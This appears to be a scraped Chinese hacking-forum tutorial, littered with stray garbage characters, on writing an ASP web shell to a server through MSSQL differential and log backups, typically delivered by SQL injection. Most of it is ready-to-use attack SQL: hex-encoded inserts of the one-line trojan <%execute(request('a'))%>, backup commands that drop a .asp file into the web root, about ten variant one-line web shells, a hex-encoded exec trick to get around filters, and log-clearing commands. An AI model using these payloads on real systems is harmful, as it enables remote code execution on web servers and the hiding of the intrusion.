MSsql差异备份总结

admin

差异备份的流程大概这样：
1.完整备份一次(保存位置当然可以改)
backup database 库名 to disk = 'c:\ddd.bak';--

2.创建表并插曲入数据
& h& ~6 h" }+ |3 Vcreate table [dbo].[dtest] ([cmd] [image]);
- a7 c& k1 E; E. S. [: B5 w/ q1 r% Rinsert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E);--
' D8 c4 Q$ S! R, N' X2 x
3.进行差异备份
6 V* l! E- }3 \- ]1 W. }backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
2 A, V$ ^: s3 @( J$ |0 \. D4 Y
& N+ X9 H( M. i# o% M! V上面
: Z/ M% A7 c" {$ I0x3C25657865637574652872657175657374282261222929253E
+ a6 U. B& ]) H" A7 {就是一句话木马的内容：<%execute(request("a"))%>
6 x/ u" W  ]+ Y3 l2 X  E; \
; f3 O$ q/ e' w如下是网上常见的差异备份代码，思路一样！
===================================================
利用差异备份提高提高backupwebshell的成功率,减少文件大小
步骤:
5 F& e+ T. u$ _$ |7 q
2 y9 s, h2 Q# @) T* L  y) ydeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x77006F006B0061006F002E00620061006B00 backup database @a to disk=@s  --备份数据库

. a" w) n2 s: u- S8 pcreate table [dbo].[xiaolu] ([cmd] [image]);  -- 创建一个表
/ d' f( S+ x# g) L

, M( r$ }* X) Q3 f& D% g! `insert into xiaolu(cmd) values(0x3C25657865637574652872657175657374282261222929253E)  --将一句话木马的16进制字符插入到表中

$ p" }. n# B- Q9 w4 B# Bdeclare @a sysname,@s nvarchar(4000) select @a=db_name(),@s=0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT  --对数据库实行差异备份
0 h" a7 U6 n# w9 X; Q' b# Y  U8 v
3 ]% u# i1 n) L. K6 b0 O* ?drop table [xiaolu]  -- 删除此表。
. B( }, E% @3 ^  s
6 W( j, Q# M1 t8 m% o. Z1 m0x77006F006B0061006F002E00620061006B00为wokao.bak
! U, T; @# |. Q1 A/ M0x3C25657865637574652872657175657374282261222929253E是<%execute(request("a"))%>
) f  H% b4 |! [8 v2 @, o/ _3 \4 B0x65003A005C007700650062005C0077006F006B0061006F002E00610073007000是e:\web\wokao.asp
5 J3 P% l, e% @* N" |1 N7 S
7 z; v; y" C( Y' i3 S声明：方法不是我想的，我只是写工具，默认得到shell是
<%execute(request("a"))%>
5 ^" {* d; m9 s( g, M===============================================================

" r+ Y9 L$ S  R% |8 ?) c我发现上面代码，有时会无效，而直接用
% _0 {/ t0 w3 b$ n( U
backup database 库名 to disk = 'c:\ddd.bak'
. [  _' Y9 c$ j4 U' s( v
create table [dbo].[dtest] ([cmd] [image]);
3 ]% B# T* W8 n. c3 S$ ]- A" y: W+ ~
insert into dtest(cmd) values(0x3C25657865637574652872657175657374282261222929253E)

backup database 库名 to disk='目标位置\d.asp' WITH DIFFERENTIAL,FORMAT;--
+ x! o" R4 e# T$ }/ f
却可以成功，所以把最原始的方法写出来！思路是前人所创,这不说大家也知道的！

库名 必须要有效的库名，一般注入工具都可以得到！如果某站过滤 "‘",就要把字符内容转为数值了！
, K. e7 S* b2 C7 r/ J
9 v( P# H/ t1 z& t  l9 M网上还有log增量备份的，我也把他记录一下
=====================================================
2 `, K! t$ W& \: S; I, i' \. L# Z另一种log增量备份技术:

2 T+ M( _6 p3 s: t5 b';alter database null set RECOVERY FULL--

';create table cmd (a image)--
0 v* U9 U" z9 j+ o8 K  Y$ c' ]' S
';backup log null to disk = 'f:\cmd' with init--

';insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)--

# G' p2 x# Z' u7 X';backup log null to disk = '备份路径'--
; I/ S9 v) T0 r/ W0 `
';drop table cmd--
8 E, q1 [& }/ X, G: W* @
';alter database XXX set RECOVERY SIMPLE--

* f: e1 H- F: r7 E3 `3 U, yPS:0x3C2565786563757465287265717565737428226122292
9253EDA 是一句话小马16进制转来的

5 {- L! s' J. _4 C5 s7 L3 n说到一句话马，还可以有这么几种写法：
3 K( G; d; K5 q5 {
a)<%%25Execute(request("a"))%%25>
' x) p, I& {  u' e8 b' tb)<%Execute(request("a"))%>
: p6 K2 G6 M- N" ^1 Nc)%><%execute request("a")%><%
d)<script language=VBScript runat=server>execute request("a")</script>
: y5 r. R/ ?" U8 E) D0 K- N* j6 [e)<%25Execute(request("a"))%25>
f)<%eval(request("a")):response.end%> 备分专用一句话   (也就是插入一句话后所有的代码都无效,在一句话这里打止)
g)"%><%eval (request (chr(309)))%><%'" 网站配置版权信息插马专用一句话
h)<%On Error Resume Next:response.clear:execute request("value"):response.End%>
I)<%eval request(0)%>
1 @! R* V6 _! i) |+ k7 |J)"%><%Eval Request(0)%> 网站配置版权信息插马专用一句话

. V& Y4 p# u9 a( y8 I. X* o. X=============================================

2 I( F" p& U/ }% a. h1 l当遇到差备过滤了/时用这个语句代替
9 d9 c: ], ?7 M5 L: d
declare @a varchar(1024);set @a=cast(0x65786563206D6D as varchar(1024));exec (@a);--

把要执行的语句转16进制然后用exec执行
! W# W- p9 v. |5 s4 c

减少备份文件大小方法如下:
: _1 ~  M) Z' l7 c6 y2 y9 v- I
总的来说就是那么简单几句,下面以备份数据库model为例子
1
id=1;use model create table cmd(str image);insert into cmd(str) values ('<%25execute(request("a"))%25>')
2
5 v( P% t4 w3 ~4 F" E9 Xid=1;backup database model to disk='你的路径‘ with differential,format;--
" f2 f2 a: S% C6 u& b* f0 |+ x
( B9 v2 b/ j& s* I0 e+ ], G/ Q( ?

# t% X! ~" I- q' L* eSQL语句清理日志
5 f/ m0 m( M; c* l注：test为数据库名
+ h- \" p( q9 o7 d) z' o) Z% I
--清空日志
DUMP TRANSACTION test WITH NO_LOG
3 d6 ]- m4 D0 J1 m' U
6 ?" {4 D5 n3 K; U, ]--截断事务日志
  \& M; B' j# X, x1 J, l# JBACKUP LOG test WITH NO_LOG

% w$ t% B: {: |3 j3 M1 u6 f--收缩数据库
3 s6 L. c9 Y* o+ {- rDBCC SHRINKDATABASE(test)
. L. J+ R7 t5 F# J! @" W# z
--收缩指定数据文件,1是文件号,可以通过这个语句查询到
Select * from sysfiles DBCC SHRINKFILE(1)
0 q4 t8 _( _+ s! ]
--以后能自动收缩
EXEC sp_dboption 'test', 'autoshrink', 'TRUE'